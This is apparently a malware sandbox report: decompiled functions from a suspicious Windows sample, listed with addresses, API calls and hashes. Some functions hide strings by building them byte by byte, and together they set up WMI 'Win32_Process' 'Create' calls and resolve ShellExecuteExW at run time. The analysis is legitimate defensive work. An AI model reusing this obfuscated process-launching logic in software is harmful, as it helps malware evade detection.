                                                                                                                            • Instruction ID: a2f8e2caac938467d81f551da4fd330c288fa99c623888310cf694e1a738714f
                                                                                                                            • Opcode Fuzzy Hash: c87631ab6f7d4e02ba606b675060841e0d5d0f591b34118a04fe3658d4926cc6
                                                                                                                            • Instruction Fuzzy Hash: 47F0E27278035A36E93037754C02FAA60246F50B99F00053AB603FA1D1DDB8D92232BE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407DA9 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 79%
                                                                                                                            			E00407DA9(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E00407C68() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E00407D5D( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x444284(_a4, _a8);
			}





                                                                                                                            0x00407db6
                                                                                                                            0x00407dca
                                                                                                                            0x00407dde
                                                                                                                            0x00407df6
                                                                                                                            0x00407de0
                                                                                                                            0x00407de7
                                                                                                                            0x00407de7
                                                                                                                            0x00407dfe
                                                                                                                            0x00000000
                                                                                                                            0x00407e00
                                                                                                                            0x00000000
                                                                                                                            0x00407e07
                                                                                                                            0x00407dfe
                                                                                                                            0x00000000
                                                                                                                            0x00407dcc
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • MonitorFromWindow.USER32(00000002,00000000), ref: 00407DBE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FromMonitorWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 721739931-0
                                                                                                                            • Opcode ID: e653fe6b440e17aced72141776092aed7f3ca8fd7caa0177a6fb2ebf31313902
                                                                                                                            • Instruction ID: d5cd339a03fbf9c993cf9009418271e150fbf018e23250f97ee73419b3b6b21c
                                                                                                                            • Opcode Fuzzy Hash: e653fe6b440e17aced72141776092aed7f3ca8fd7caa0177a6fb2ebf31313902
                                                                                                                            • Instruction Fuzzy Hash: 6CF03131D08109ABDF016F61CC45ABF3BBDAF00385B048436F815E51A0DB39EA559B9B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004308CC Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 88%
                                                                                                                            			E004308CC() {
				signed int _v8;
				char _v16;
				void* __esi;
				signed int _t8;
				intOrPtr* _t15;
				intOrPtr _t16;
				char _t20;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t24;
				int _t25;
				signed int _t27;

				_t8 =  *0x441590; // 0x4917eadc
				_v8 = _t8 ^ _t27;
				_t24 = 0;
				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
					L4:
					_t25 = GetACP();
				} else {
					_t20 = _v16;
					_t15 =  &_v16;
					if(_t20 == 0) {
						goto L4;
					} else {
						do {
							_t15 = _t15 + 1;
							_t24 = _t24 * 0xa + _t20 - 0x30;
							_t20 =  *_t15;
						} while (_t20 != 0);
						if(_t24 == 0) {
							goto L4;
						}
					}
				}
				return E0041D773(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
			}















                                                                                                                            0x004308d2
                                                                                                                            0x004308d9
                                                                                                                            0x004308dd
                                                                                                                            0x004308f9
                                                                                                                            0x0043091a
                                                                                                                            0x00430920
                                                                                                                            0x004308fb
                                                                                                                            0x004308fb
                                                                                                                            0x00430900
                                                                                                                            0x00430903
                                                                                                                            0x00000000
                                                                                                                            0x00430905
                                                                                                                            0x00430905
                                                                                                                            0x0043090b
                                                                                                                            0x0043090c
                                                                                                                            0x00430910
                                                                                                                            0x00430912
                                                                                                                            0x00430918
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00430918
                                                                                                                            0x00430903
                                                                                                                            0x00430930

                                                                                                                            APIs
                                                                                                                            • GetThreadLocale.KERNEL32 ref: 004308DF
                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 004308F1
                                                                                                                            • GetACP.KERNEL32 ref: 0043091A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4232894706-0
                                                                                                                            • Opcode ID: 23663884bf92564f3cad3eac58c0f766dcc0215ef132461951fa62ba75ff735b
                                                                                                                            • Instruction ID: 5ac5015b2948bc6561ceb8a137d31530b093fa89260b95182f6e2ab2cc51d199
                                                                                                                            • Opcode Fuzzy Hash: 23663884bf92564f3cad3eac58c0f766dcc0215ef132461951fa62ba75ff735b
                                                                                                                            • Instruction Fuzzy Hash: 7FF0C871E0022C6BDB159F6498257EFB7A8AF09B41F00116DD951E7241D6246E0887D8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401840 Relevance: 70.4, APIs: 18, Strings: 22, Instructions: 362memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 32%
                                                                                                                            			E00401840(void* __ecx, void* __ebp, void* __eflags) {
				int _v4;
				char _v12;
				signed int _v16;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				intOrPtr _v116;
				char _v128;
				char _v136;
				char _v143;
				char _v144;
				char _v145;
				char _v146;
				char _v147;
				char _v148;
				char _v149;
				char _v150;
				char _v151;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v172;
				short* _v180;
				short* _v184;
				char _v196;
				char _v204;
				char _v220;
				intOrPtr _v232;
				char _v240;
				int _v248;
				int _v252;
				int _v256;
				void* _v264;
				short* _v268;
				char _v272;
				intOrPtr _v276;
				intOrPtr* _v280;
				intOrPtr _v284;
				char _v288;
				char _v292;
				intOrPtr _v300;
				char _v312;
				short _v316;
				intOrPtr _v320;
				char _v328;
				intOrPtr* _v348;
				char _v356;
				char _v368;
				intOrPtr* _v376;
				char _v380;
				intOrPtr* _v388;
				intOrPtr _v400;
				char _v404;
				intOrPtr* _v408;
				intOrPtr* _v412;
				intOrPtr* _v416;
				intOrPtr _v420;
				intOrPtr* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t115;
				signed int _t117;
				intOrPtr _t121;
				intOrPtr* _t126;
				intOrPtr* _t131;
				short* _t138;
				short* _t139;
				short* _t142;
				intOrPtr* _t143;
				intOrPtr* _t146;
				intOrPtr* _t149;
				intOrPtr _t151;
				intOrPtr* _t152;
				intOrPtr* _t154;
				intOrPtr* _t157;
				intOrPtr* _t162;
				intOrPtr* _t163;
				intOrPtr* _t164;
				intOrPtr* _t165;
				void* _t179;
				void* _t180;
				intOrPtr _t188;
				intOrPtr _t196;
				intOrPtr _t197;
				intOrPtr _t198;
				intOrPtr _t199;
				intOrPtr _t200;
				int _t210;
				void* _t211;
				short* _t212;
				short* _t213;
				intOrPtr _t214;
				intOrPtr* _t215;
				intOrPtr _t217;
				void* _t218;
				int _t219;
				int _t220;
				short* _t221;
				int _t224;
				int _t225;
				intOrPtr _t226;
				void* _t227;
				signed int _t228;
				signed int _t229;

				_t180 = __ecx;
				_push(0xffffffff);
				_push(E004322E6);
				_push( *[fs:0x0]);
				_t228 = _t227 - 0x84;
				_t115 =  *0x441590; // 0x4917eadc
				_v16 = _t115 ^ _t228;
				_t117 =  *0x441590; // 0x4917eadc
				_push(_t117 ^ _t228);
				 *[fs:0x0] =  &_v12;
				_t210 = 0;
				_v88 = 0x746f6f72;
				_v84 = 0x6d69635c;
				_v80 = 0x3276;
				_t121 = E00402480( &_v88);
				_t217 = _t121;
				_t229 = _t228 + 4;
				_v116 = _t217;
				if(_t217 == 0) {
					_t121 = E00401480(0, _t180, 0, _t217, 0x8007000e);
				}
				_v4 = 0;
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				if(_t121 < 0) {
					L35:
					__imp__#6();
					 *[fs:0x0] = _v52;
					_t211 = _t217;
					_pop(_t218);
					_pop(_t179);
					return E0041D773(_t210, _t179, _v56 ^ _t229, _t201, _t211, _t218);
				} else {
					_t201 =  *0x445274;
					_push( &_v128);
					_push(0x438338);
					_push(1);
					_push(0);
					_push(0x438408);
					if( *(( *0x445274)[0x44])() < 0) {
						goto L35;
					}
					_v196 = 0;
					_t201 =  &_v196;
					_push( &_v196);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_v60 = 1;
					_t126 = _v148;
					_push(0);
					_push(_t217);
					_push(_t126);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t126 + 0xc))))() >= 0) {
						_t187 =  *0x445274;
						_t201 = _t187[0x3c];
						_push(0);
						_push(0);
						_push(3);
						_push(3);
						_push(0);
						_push(0);
						_push(0xa);
						_push(_v232);
						if( *(_t187[0x3c])() < 0) {
							goto L5;
						}
						_v248 = 0;
						_v252 = 0;
						_v256 = 0;
						_v128 = 4;
						_v163 = 0x72;
						_v149 = 0x72;
						_v164 = 0x43;
						_v162 = 0x65;
						_v161 = 0x61;
						_v160 = 0x74;
						_v159 = 0x65;
						_v158 = 0;
						_v156 = 0x57;
						_v155 = 0x69;
						_v154 = 0x6e;
						_v153 = 0x33;
						_v152 = 0x32;
						_v151 = 0x5f;
						_v150 = 0x50;
						_v148 = 0x6f;
						_v147 = 0x63;
						_v146 = 0x65;
						_v145 = 0x73;
						_v144 = 0x73;
						_v143 = 0;
						_t224 =  *0x4427d8();
						_t46 =  &_v164; // 0x32
						_t219 = MultiByteToWideChar(_t224, 0, _t46, 0xffffffff, 0, 0);
						_t47 = _t219 - 1; // -1
						_t138 = _t47;
						__imp__#4(0, _t138);
						_t212 = _t138;
						if(_t212 == 0) {
							L11:
							_v268 = _t212;
							_t139 = _t212;
							L12:
							_v180 = _t139;
							if(_t139 == 0) {
								E00401480(0, _t187, _t212, _t219, 0x8007000e);
							}
							_v136 = 5;
							_t225 =  *0x4427d8();
							_t220 = MultiByteToWideChar(_t225, 0,  &_v164, 0xffffffff, 0, 0);
							_t54 = _t220 - 1; // -1
							_t142 = _t54;
							__imp__#4(0, _t142);
							_t213 = _t142;
							if(_t213 == 0 || MultiByteToWideChar(_t225, 0,  &_v172, 0xffffffff, _t213, _t220) == _t220) {
								_t221 = _t213;
							} else {
								__imp__#6(_t213);
								_t221 = 0;
							}
							_v184 = _t221;
							if(_t221 == 0) {
								E00401480(0, _t187, _t213, _t221, 0x8007000e);
							}
							_v144 = 6;
							_t143 = _v280;
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 0x18))))(_t143, _t221, 0, 0,  &_v264, 0);
							_t146 = _v288;
							_t226 = _v300;
							 *((intOrPtr*)( *((intOrPtr*)( *_t146 + 0x4c))))(_t146, _t226, 0,  &_v292, 0);
							_t149 = _v312;
							_t191 =  *_t149;
							_t151 =  *((intOrPtr*)( *((intOrPtr*)( *_t149 + 0x3c))))(_t149, 0,  &_v316);
							__imp__#2(0x445278);
							_t214 = _t151;
							_v252 = _t214;
							if(_t214 == 0) {
								_t151 = E00401480(0, _t191, _t214, _t221, 0x8007000e);
							}
							_v204 = 7;
							_v312 = 0;
							__imp__#9( &_v312);
							_v316 = 8;
							__imp__#149(_t214);
							__imp__#150(_t214, _t151);
							_v320 = _t151;
							if(_t151 == 0) {
								_v328 = 0xa;
								_v320 = 0x8007000e;
								E00401480(0,  &_v312, _t214, _t221, 0x8007000e);
							}
							_v220 = 8;
							_t152 = _v348;
							_v292 = 0x6f0043;
							_v288 = 0x6d006d;
							_v284 = 0x6e0061;
							_v280 = 0x4c0064;
							_v276 = 0x6e0069;
							_v272 = 0x65;
							 *((intOrPtr*)( *((intOrPtr*)( *_t152 + 0x14))))(_t152,  &_v292, 0,  &_v328, 0);
							_v356 = 0;
							_v240 = 9;
							_t154 = _v376;
							_t201 = _v368;
							 *((intOrPtr*)( *((intOrPtr*)( *_t154 + 0x60))))(_t154, _t221, _t226, 0, 0, _v368,  &_v356, 0);
							_v272 = 8;
							_t157 = _v388;
							_v404 = 1;
							if(_t157 != 0) {
								_t200 =  *_t157;
								_t201 =  *(_t200 + 8);
								 *( *(_t200 + 8))(_t157);
							}
							__imp__#9( &_v380);
							_t215 = __imp__#6;
							 *_t215(_t214);
							 *_t215(_t221);
							 *_t215(_t226);
							_v288 = 3;
							_t162 = _v416;
							if(_t162 != 0) {
								_t199 =  *_t162;
								_t201 =  *(_t199 + 8);
								 *( *(_t199 + 8))(_t162);
							}
							_v288 = 2;
							_t163 = _v412;
							if(_t163 != 0) {
								_t198 =  *_t163;
								_t201 =  *(_t198 + 8);
								 *( *(_t198 + 8))(_t163);
							}
							_v288 = 1;
							_t164 = _v408;
							if(_t164 != 0) {
								_t197 =  *_t164;
								_t201 =  *(_t197 + 8);
								 *( *(_t197 + 8))(_t164);
							}
							_v288 = 0;
							_t165 = _v424;
							if(_t165 != 0) {
								_t196 =  *_t165;
								_t201 =  *(_t196 + 8);
								 *( *(_t196 + 8))(_t165);
							}
							_t217 = _v400;
							_t210 = _v420;
							goto L35;
						}
						_t48 =  &_v172; // 0x32
						_t187 = _t48;
						if(MultiByteToWideChar(_t224, 0, _t48, 0xffffffff, _t212, _t219) == _t219) {
							goto L11;
						}
						__imp__#6(_t212);
						_t139 = 0;
						_v272 = 0;
						goto L12;
					}
					L5:
					_v128 = 0;
					_t131 = _v264;
					if(_t131 != 0) {
						_t188 =  *_t131;
						_t201 =  *(_t188 + 8);
						 *( *(_t188 + 8))(_t131);
					}
					goto L35;
				}
			}
























































































































                                                                                                                            0x00401840
                                                                                                                            0x00401840
                                                                                                                            0x00401842
                                                                                                                            0x0040184d
                                                                                                                            0x0040184e
                                                                                                                            0x00401854
                                                                                                                            0x0040185b
                                                                                                                            0x00401866
                                                                                                                            0x0040186d
                                                                                                                            0x00401875
                                                                                                                            0x00401882
                                                                                                                            0x00401884
                                                                                                                            0x0040188c
                                                                                                                            0x00401894
                                                                                                                            0x0040189c
                                                                                                                            0x004018a1
                                                                                                                            0x004018a3
                                                                                                                            0x004018a8
                                                                                                                            0x004018ac
                                                                                                                            0x004018b3
                                                                                                                            0x004018b3
                                                                                                                            0x004018c3
                                                                                                                            0x004018ca
                                                                                                                            0x004018d2
                                                                                                                            0x00401cba
                                                                                                                            0x00401cbb
                                                                                                                            0x00401cca
                                                                                                                            0x00401cd2
                                                                                                                            0x00401cd3
                                                                                                                            0x00401cd5
                                                                                                                            0x00401cea
                                                                                                                            0x004018d8
                                                                                                                            0x004018d8
                                                                                                                            0x004018e5
                                                                                                                            0x004018e6
                                                                                                                            0x004018eb
                                                                                                                            0x004018ed
                                                                                                                            0x004018ee
                                                                                                                            0x004018f7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004018fd
                                                                                                                            0x00401901
                                                                                                                            0x00401905
                                                                                                                            0x00401906
                                                                                                                            0x00401907
                                                                                                                            0x00401908
                                                                                                                            0x00401909
                                                                                                                            0x0040190a
                                                                                                                            0x0040190b
                                                                                                                            0x00401913
                                                                                                                            0x00401919
                                                                                                                            0x0040191a
                                                                                                                            0x0040191b
                                                                                                                            0x00401923
                                                                                                                            0x00401949
                                                                                                                            0x0040194f
                                                                                                                            0x00401952
                                                                                                                            0x00401953
                                                                                                                            0x00401954
                                                                                                                            0x00401956
                                                                                                                            0x00401958
                                                                                                                            0x00401959
                                                                                                                            0x0040195a
                                                                                                                            0x0040195c
                                                                                                                            0x00401961
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00401963
                                                                                                                            0x00401967
                                                                                                                            0x0040196b
                                                                                                                            0x0040196f
                                                                                                                            0x00401979
                                                                                                                            0x0040197d
                                                                                                                            0x00401986
                                                                                                                            0x0040198b
                                                                                                                            0x00401990
                                                                                                                            0x00401995
                                                                                                                            0x0040199d
                                                                                                                            0x004019a5
                                                                                                                            0x004019ac
                                                                                                                            0x004019b4
                                                                                                                            0x004019bc
                                                                                                                            0x004019c4
                                                                                                                            0x004019cc
                                                                                                                            0x004019d4
                                                                                                                            0x004019dc
                                                                                                                            0x004019e4
                                                                                                                            0x004019ec
                                                                                                                            0x004019f4
                                                                                                                            0x004019fc
                                                                                                                            0x00401a03
                                                                                                                            0x00401a0a
                                                                                                                            0x00401a19
                                                                                                                            0x00401a1d
                                                                                                                            0x00401a2d
                                                                                                                            0x00401a2f
                                                                                                                            0x00401a2f
                                                                                                                            0x00401a34
                                                                                                                            0x00401a3a
                                                                                                                            0x00401a3e
                                                                                                                            0x00401a67
                                                                                                                            0x00401a67
                                                                                                                            0x00401a6b
                                                                                                                            0x00401a6d
                                                                                                                            0x00401a6f
                                                                                                                            0x00401a73
                                                                                                                            0x00401a7a
                                                                                                                            0x00401a7a
                                                                                                                            0x00401a7f
                                                                                                                            0x00401a99
                                                                                                                            0x00401aa3
                                                                                                                            0x00401aa5
                                                                                                                            0x00401aa5
                                                                                                                            0x00401aaa
                                                                                                                            0x00401ab0
                                                                                                                            0x00401ab4
                                                                                                                            0x00401ad9
                                                                                                                            0x00401ace
                                                                                                                            0x00401acf
                                                                                                                            0x00401ad5
                                                                                                                            0x00401ad5
                                                                                                                            0x00401add
                                                                                                                            0x00401ae1
                                                                                                                            0x00401ae8
                                                                                                                            0x00401ae8
                                                                                                                            0x00401af4
                                                                                                                            0x00401afc
                                                                                                                            0x00401b08
                                                                                                                            0x00401b0a
                                                                                                                            0x00401b0e
                                                                                                                            0x00401b20
                                                                                                                            0x00401b22
                                                                                                                            0x00401b26
                                                                                                                            0x00401b32
                                                                                                                            0x00401b39
                                                                                                                            0x00401b3f
                                                                                                                            0x00401b43
                                                                                                                            0x00401b47
                                                                                                                            0x00401b4e
                                                                                                                            0x00401b4e
                                                                                                                            0x00401b57
                                                                                                                            0x00401b60
                                                                                                                            0x00401b65
                                                                                                                            0x00401b6c
                                                                                                                            0x00401b73
                                                                                                                            0x00401b7b
                                                                                                                            0x00401b83
                                                                                                                            0x00401b87
                                                                                                                            0x00401b8e
                                                                                                                            0x00401b95
                                                                                                                            0x00401b9d
                                                                                                                            0x00401b9d
                                                                                                                            0x00401ba2
                                                                                                                            0x00401baa
                                                                                                                            0x00401bb9
                                                                                                                            0x00401bc1
                                                                                                                            0x00401bc9
                                                                                                                            0x00401bd1
                                                                                                                            0x00401bd9
                                                                                                                            0x00401be1
                                                                                                                            0x00401bf0
                                                                                                                            0x00401bf2
                                                                                                                            0x00401bf7
                                                                                                                            0x00401bff
                                                                                                                            0x00401c0a
                                                                                                                            0x00401c17
                                                                                                                            0x00401c19
                                                                                                                            0x00401c21
                                                                                                                            0x00401c27
                                                                                                                            0x00401c2f
                                                                                                                            0x00401c31
                                                                                                                            0x00401c33
                                                                                                                            0x00401c37
                                                                                                                            0x00401c37
                                                                                                                            0x00401c3e
                                                                                                                            0x00401c45
                                                                                                                            0x00401c4b
                                                                                                                            0x00401c4e
                                                                                                                            0x00401c51
                                                                                                                            0x00401c53
                                                                                                                            0x00401c5b
                                                                                                                            0x00401c61
                                                                                                                            0x00401c63
                                                                                                                            0x00401c65
                                                                                                                            0x00401c69
                                                                                                                            0x00401c69
                                                                                                                            0x00401c6b
                                                                                                                            0x00401c73
                                                                                                                            0x00401c79
                                                                                                                            0x00401c7b
                                                                                                                            0x00401c7d
                                                                                                                            0x00401c81
                                                                                                                            0x00401c81
                                                                                                                            0x00401c83
                                                                                                                            0x00401c8b
                                                                                                                            0x00401c91
                                                                                                                            0x00401c93
                                                                                                                            0x00401c95
                                                                                                                            0x00401c99
                                                                                                                            0x00401c99
                                                                                                                            0x00401c9b
                                                                                                                            0x00401ca2
                                                                                                                            0x00401ca8
                                                                                                                            0x00401caa
                                                                                                                            0x00401cac
                                                                                                                            0x00401cb0
                                                                                                                            0x00401cb0
                                                                                                                            0x00401cb2
                                                                                                                            0x00401cb6
                                                                                                                            0x00000000
                                                                                                                            0x00401cb6
                                                                                                                            0x00401a44
                                                                                                                            0x00401a44
                                                                                                                            0x00401a56
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00401a59
                                                                                                                            0x00401a5f
                                                                                                                            0x00401a61
                                                                                                                            0x00000000
                                                                                                                            0x00401a61
                                                                                                                            0x00401925
                                                                                                                            0x00401925
                                                                                                                            0x0040192c
                                                                                                                            0x00401932
                                                                                                                            0x00401938
                                                                                                                            0x0040193a
                                                                                                                            0x0040193e
                                                                                                                            0x0040193e
                                                                                                                            0x00000000
                                                                                                                            0x00401932

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00402480: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000,?,004018A1), ref: 004024A6
                                                                                                                              • Part of subcall function 00402480: SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 004024B4
                                                                                                                              • Part of subcall function 00402480: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000,?,004018A1), ref: 004024C8
                                                                                                                              • Part of subcall function 00402480: SysFreeString.OLEAUT32(00000000), ref: 004024D3
                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004018CA
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,23niW,000000FF,00000000,00000000), ref: 00401A27
                                                                                                                            • SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 00401A34
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,23niW,000000FF,00000000,00000000), ref: 00401A4E
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00401A59
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A9D
                                                                                                                            • SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 00401AAA
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401AC4
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00401ACF
                                                                                                                            • SysAllocString.OLEAUT32(00445278), ref: 00401B39
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00401B65
                                                                                                                            • SysStringByteLen.OLEAUT32(00000000), ref: 00401B73
                                                                                                                            • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 00401B7B
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00401C3E
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00401C4B
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00401C4E
                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00401C51
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00401CBB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Byte$Free$CharMultiWide$Alloc$ClearVariant$InitializeSecurity
                                                                                                                            • String ID: 23niW$3$5C$C$C$W$\cim$a$a$c$d$e$e$e$e$i$i$m$n$root$t$v2
                                                                                                                            • API String ID: 1235354062-953233250
                                                                                                                            • Opcode ID: 29e75be248aab7db7444b8409ac90ae41c0368553a0b207229a804275f53d6c2
                                                                                                                            • Instruction ID: 84fde7918c04e5b869c8146492161cf0455d5d345a236b0e2ef2be79e3bd600d
                                                                                                                            • Opcode Fuzzy Hash: 29e75be248aab7db7444b8409ac90ae41c0368553a0b207229a804275f53d6c2
                                                                                                                            • Instruction Fuzzy Hash: 9FD19D71108380AFD320CF69CC84F6BBBE9BF89348F144A6DF189972A1C7759945CB66
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401700 Relevance: 56.1, APIs: 3, Strings: 29, Instructions: 82libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 90%
                                                                                                                            			E00401700(struct HINSTANCE__** __esi) {
				signed int _v4;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				void* __ebx;
				void* __edi;
				signed int _t56;

				_t77 =  &_v64;
				_t56 =  *0x441590; // 0x4917eadc
				_v4 = _t56 ^  &_v64;
				_v41 = 0x6c;
				_v37 = 0x6c;
				_v48 = 0x47;
				_v47 = 0x65;
				_v46 = 0x74;
				_v45 = 0x4d;
				_v44 = 0x6f;
				_v43 = 0x64;
				_v42 = 0x75;
				_v40 = 0x65;
				_v39 = 0x46;
				_v38 = 0x69;
				_v36 = 0x65;
				_v35 = 0x4e;
				_v34 = 0x61;
				_v33 = 0x6d;
				_v32 = 0x65;
				_v31 = 0x57;
				_v30 = 0;
				__esi[9] = GetProcAddress( *__esi,  &_v48);
				_v64 = 0x6c656853;
				_v60 = 0x6578456c;
				_v56 = 0x65747563;
				_v52 = 0x577845;
				__esi[5] = GetProcAddress(__esi[1],  &_v64);
				_v23 = 0x72;
				_v22 = 0x72;
				_v16 = 0x63;
				_v15 = 0x63;
				_v13 = 0x73;
				_v12 = 0x73;
				_v28 = 0x53;
				_v27 = 0x61;
				_v26 = 0x66;
				_v25 = 0x65;
				_v24 = 0x41;
				_v21 = 0x61;
				_v20 = 0x79;
				_v19 = 0x55;
				_v18 = 0x6e;
				_v17 = 0x61;
				_v14 = 0x65;
				_v11 = 0x44;
				_v10 = 0x61;
				_v9 = 0x74;
				_v8 = 0x61;
				_v7 = 0;
				__esi[0x10] = GetProcAddress(__esi[4],  &_v28);
				return E0041D773(_t67, 0x61, _v4 ^ _t77,  &_v64, GetProcAddress, __esi);
			}




















































                                                                                                                            0x00401700
                                                                                                                            0x00401703
                                                                                                                            0x0040170a
                                                                                                                            0x0040171c
                                                                                                                            0x00401720
                                                                                                                            0x0040172a
                                                                                                                            0x0040172f
                                                                                                                            0x00401734
                                                                                                                            0x00401739
                                                                                                                            0x0040173e
                                                                                                                            0x00401743
                                                                                                                            0x00401748
                                                                                                                            0x0040174d
                                                                                                                            0x00401752
                                                                                                                            0x00401757
                                                                                                                            0x0040175c
                                                                                                                            0x00401761
                                                                                                                            0x00401766
                                                                                                                            0x0040176a
                                                                                                                            0x0040176f
